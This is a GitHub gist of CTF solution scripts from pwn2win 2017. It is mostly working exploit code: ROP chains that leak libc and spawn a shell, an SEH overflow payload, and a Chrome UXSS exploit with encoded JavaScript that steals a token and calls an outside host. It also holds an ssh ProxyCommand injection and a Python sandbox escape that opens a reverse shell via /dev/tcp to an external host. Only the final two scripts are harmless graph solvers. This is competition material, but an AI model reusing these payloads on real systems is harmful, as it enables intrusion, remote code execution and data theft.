-
-
Save niklasb/1990a0baf2afa2020e450aa7c000dca3 to your computer and use it in GitHub Desktop.
pwn2win 2017 solution dump
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwnlib.tools import * # https://github.com/niklasb/ctf-tools | |
connect() | |
ru('name?\n') | |
pop_rdi = 0x004007f3 | |
pop_rsi_r15=0x4007f1 | |
puts=0x400570 | |
fflush=0x4005d0 | |
fgets=0x4005b0 | |
rbp = 0x600ba0 | |
rop = '' | |
rop += p64(pop_rdi) | |
rop += p64(0x600b98) | |
rop += p64(puts) | |
rop += p64(pop_rdi) | |
rop += p64(0) | |
rop += p64(fflush) | |
rop += p64(0x400743) | |
assert not '\n' in rop | |
sendln('a'*32+p64(rbp)+rop) | |
libc = u64(readln()[-6:]+'\0\0')-0x7ffff7a7aad0+0x00007ffff7a0d000 | |
info('libc @ %p', libc) | |
stage2 = '' | |
stage2 += p64(0x424242424242) | |
stage2 += p64(0x400780) | |
stage2 += 'F'*16 | |
stage2 += p64(0x600ba0) | |
stage2 += p64(libc+0x21102) # pop rdi | |
stage2 += p64(1337) | |
stage2 += p64(libc+0x000202e8) # pop rsi | |
stage2 += p64(1337) | |
stage2 += p64(libc+0x0001b92) # pop rdx | |
stage2 += p64(1337) | |
stage2 +=p64(libc+0xcd570) # setresuid | |
stage2 += p64(libc+0x21102) # pop rdi | |
stage2 += p64(libc+0x18cd17) # "/bin/sh" | |
stage2 += p64(libc+0x45390) # system | |
stage2 += 'G'*(0x400-len(stage2)) | |
assert not '\n' in stage2 | |
sendln(stage2) | |
interact() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwnlib.tools import * # https://github.com/niklasb/ctf-tools | |
# Run until you get a shell. Should work in 1/16 tries (4 bits are guessed) | |
connect() | |
ru('Exit with ".".\n') | |
pop3=0x080486ad | |
store=0x80484FB | |
got=0x8049900 | |
plt=0x80483A0 | |
popebp=0x08048510 | |
nl=0x80486E1 | |
def write(addr, val): | |
return [store, pop3, addr, 0, val] | |
rop = [] | |
rop += write(got-2, 0xd1404343) # puts | |
rop += [plt, popebp, got] | |
rop += write(got-2, 0xb3304343) # fflush | |
rop += [plt, popebp, 0] | |
rop += write(got-2, 0xc8904343) # gets | |
rop += [plt, popebp, 0x80498c8] | |
rop += [plt, popebp, got] | |
rop += [plt, popebp, 0x80498c8] | |
for i, x in enumerate(rop): | |
if x >= 2**31: | |
x-=2**32 | |
send('%d\n%d\n'%(72+i, x)) | |
sendln('.') | |
libc = u32(readn(4))-0xf7e7d140+0xf7e1e000 | |
if libc&0xfff: | |
exit(1) | |
info('libc %p', libc) | |
system = libc+0x3a940 | |
info('system %p', system) | |
sendln('/bin/sh;') | |
raw_input() | |
sendln(p32(system)) | |
enjoy() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
payload = 'A'*352 | |
payload += struct.pack("<I",0x8011798) | |
payload += 'B'*(0x200-len(payload)) | |
sys.stdout.write(payload) | |
# python2 seh.py | nc host port |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<!-- UXSS 1day in Chrome: | |
https://bugs.chromium.org/p/chromium/issues/detail?id=668552 | |
--> | |
<base href="javascript:top.f();//"></base> | |
<object name="privateScriptController"></object> | |
<object data="#"></object> | |
<script> | |
if (location.protocol == 'file:') { | |
throw alert('HTTP server is required.'); | |
} | |
function f() { | |
document.getElementsByName('privateScriptController')[0].remove(); | |
frames[0].document.documentElement.appendChild(c); | |
} | |
var i = document.documentElement.appendChild(document.createElement('iframe')); | |
var d = i.contentDocument; | |
i.remove(); | |
var c = d.documentElement.appendChild(d.createElement('div')); | |
var m = c.appendChild(d.createElement('marquee')); | |
var i0 = c.appendChild(d.createElement('iframe')); | |
var i1 = c.appendChild(d.createElement('iframe')); | |
m.setAttribute('class', 'a'); | |
document.adoptNode(c); | |
var code= ( | |
'var x=new XMLHttpRequest();'+ | |
'x.open("GET","http://careers.butcher.team/analysis/curriculums",false);'+ | |
'x.send();'+ | |
'var token=x.responseText.split("\'accept\',\'")[1].split("\'")[0];'+ | |
'var y=new XMLHttpRequest();'+ | |
'y.open("POST","http://careers.butcher.team/analysis/accept",false);'+ | |
'y.setRequestHeader("Content-type", "application/json");'+ | |
'y.send(JSON.stringify({token:token}));'+ | |
'var z=new XMLHttpRequest();'+ | |
'z.open("GET","http://dtun.de/done/",false);'+ | |
'z.send();'); | |
var payload = ''; | |
for (var i = 0; i < code.length; ++i) { | |
if (i>0) payload += ','; | |
payload += code.charCodeAt(i); | |
} | |
console.log(payload); | |
i1.onload = function() { | |
try { | |
i1.contentDocument; | |
} catch(e) { | |
i1.onload = null; | |
i1.src = 'javascript:eval(String.fromCharCode('+payload+'))'; | |
document.querySelector('base').remove(); | |
document.documentElement.appendChild(document.createElement('iframe')).src = 's.svg'; | |
} | |
} | |
i1.src = 'http://careers.butcher.team/analysis/curriculums'; | |
</script> | |
<!-- This one is to delay the load. the server must listen, but not give a response! --> | |
<img src="http://dtun.de:4444/"/> | |
<!-- Also serve /s.svg: | |
<svg xmlns="http://www.w3.org/2000/svg"> | |
<iframe xmlns="http://www.w3.org/1999/xhtml"></iframe> | |
<script> | |
frames[0].onunload = function() { | |
frames[0].frameElement.appendChild(top.c); | |
} | |
</script> | |
<element a="1" a="2" /> | |
</svg> | |
--> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
4 | |
ssh://-oProxyCommand=sh<&2 /a | |
ls -alih>&2 | |
cat flag.txt>&2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwnlib.tools import * #https://github.com/niklasb/ctf-tools | |
connect() | |
sendln(r'\D') | |
sendln(r'Revoke') | |
sendln(r'Op\en') | |
sendln(r'gen eval(Option())') | |
sendln(r'''raw_input([x for x in ().__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system('/bin/bash -c "sh >/dev/tcp/kitctf.de/5555 <&1 2>&1"'))''') | |
interact() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sage.all import matrix, Integer, Rational | |
from scipy import linalg | |
from pwnlib.tools import * # https://github.com/niklasb/ctf-tools | |
import ssl | |
s=ssl.wrap_socket(connect()) | |
while True: | |
queries = [] | |
edges = {} | |
n=0 | |
while True: | |
ln = map(int,readln(s).split()) | |
if not ln: | |
break | |
if len(ln)==2: | |
queries.append(ln) | |
else: | |
assert not queries | |
x,y=min(ln[:2]),max(ln[:2]) | |
if x == y: | |
continue | |
n=max(n,x) | |
n=max(n,y) | |
edges.setdefault((x,y),[]) | |
edges[x,y].append(ln[2]) | |
print "DONE READING %d %d %d" % (n, len(edges), len(queries)) | |
L = [[0]*n for _ in range(n)] | |
seen = set() | |
for (x,y), ws in edges.items(): | |
assert x != y | |
assert (x,y) not in seen and (y,x) not in seen | |
seen.add((x,y)) | |
w = 1./sum(1./w for w in ws) | |
x-=1 | |
y-=1 | |
L[x][y] = L[y][x] = -1.0/w | |
for i in range(n): | |
L[i][i] = -sum(L[i]) | |
L = matrix(L) | |
H = matrix(linalg.pinv(L)) | |
for x, y in queries: | |
x-=1 | |
y-=1 | |
r=H[x,x]+H[y,y]-H[x,y]-H[y,x] | |
# print x, y, '%.3f'%r | |
sendln(s,'%.03f'%r) | |
interact() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from collections import defaultdict | |
import ssl | |
from pwnlib.tools import * | |
s=ssl.wrap_socket(connect()) | |
# s=connect() | |
def solve(n, edges, queries): | |
par = {} | |
childs = defaultdict(list) | |
def find(x): | |
if par[x]==x: | |
return x | |
p=find(par[x]) | |
par[x]=p | |
return p | |
def merge(x, y): | |
assert x != y and par[x]==x and par[y]==y | |
par[x]=y | |
childs[y].append(x) | |
def dfs(x): | |
yield x | |
for y in childs[x]: | |
for a in dfs(y): | |
yield a | |
edges=sorted(edges,key=lambda (x,y,w): w, reverse=True) | |
ans = [[-1]*n for _ in range(n)] | |
for i in range(n): | |
par[i]=i | |
seen=set() | |
for x, y, w in edges: | |
# print x, y, w | |
R=(min(x,y),max(x,y)) | |
assert R not in seen | |
seen.add(R) | |
x=find(x) | |
y=find(y) | |
if x==y: | |
continue | |
A = list(dfs(x)) | |
B = list(dfs(y)) | |
for a in A: | |
for b in B: | |
assert ans[a][b]==-1 | |
ans[a][b]=ans[b][a]=w | |
merge(x, y) | |
res = [] | |
for x, y in queries: | |
assert x!=y | |
assert ans[x][y]!=-1 | |
res.append(ans[x][y]) | |
return res | |
while True: | |
queries = [] | |
edges = [] | |
n=0 | |
while True: | |
ln = readln(s) | |
ln = map(int,ln.split()) | |
if not ln: | |
break | |
ln[0]-=1 | |
ln[1]-=1 | |
assert ln[0]!=ln[1] | |
if len(ln)==2:send | |
queries.append(ln) | |
else: | |
assert not queries | |
n=max(n,ln[0]+1,ln[1]+1) | |
# print ln | |
edges.append(ln) | |
print "DONE READING %d %d %d" % (n, len(edges), len(queries)) | |
res = solve(n, edges, queries) | |
send(s,'\n'.join('%d.0'%a for a in res)) | |
interact() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment